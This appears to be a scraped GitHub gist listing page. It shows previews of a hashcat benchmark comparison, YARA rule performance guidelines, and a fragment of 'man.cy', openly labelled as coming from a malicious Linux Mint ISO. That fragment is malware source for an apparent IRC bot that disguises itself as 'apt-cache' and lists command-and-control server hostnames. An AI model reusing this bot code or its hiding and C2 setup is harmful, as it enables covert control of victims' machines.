Skip to content

Instantly share code, notes, and snippets.

View zam89's full-sized avatar

Zam zam89

View GitHub Profile
@ayebrian
ayebrian / vmware.md
Last active April 21, 2025 15:46
CONTENT REMOVED

Content removed in accordance with GitHub's Terms of Service.

Thank you for your understanding.

@kurobeats
kurobeats / man.cy
Created February 21, 2016 09:00
man.cy from malicious Linux Mint iso
#define STARTUP 1
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apt-cache" // What you want this to hide as
#define CHAN "#mint" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=5; // Must change this to equal number of servers down there
char *servers[] = {
"updates.absentvodka.com",
"updates.mintylinux.com",
"eggstrawdinarry.mylittlerepo.com",
----------------------------------------------------------------------------------------------------
Rough hashcat price/power/performance comparison
(based on descrypt (traditional DES) benchmarks, but useful for other hashes as well)
by Royce Williams (@tychotithonus) - 2015-06-21
----------------------------------------------------------------------------------------------------
Modern cards:
h/s (single) device US$ h/$/s h/€/s* Max W h/W/s Reference
------------ ----------- ----- ------ ------ ------ ------ ----------------------------
@Neo23x0
Neo23x0 / yara_performance_guidelines.md
Last active December 22, 2024 23:49
YARA Performance Guidelines

This Gist has been transfered into a Github Repo. You'll find the most recent version here.

YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

  • Revision 1.4, October 2020, applies to all YARA versions higher than 3.7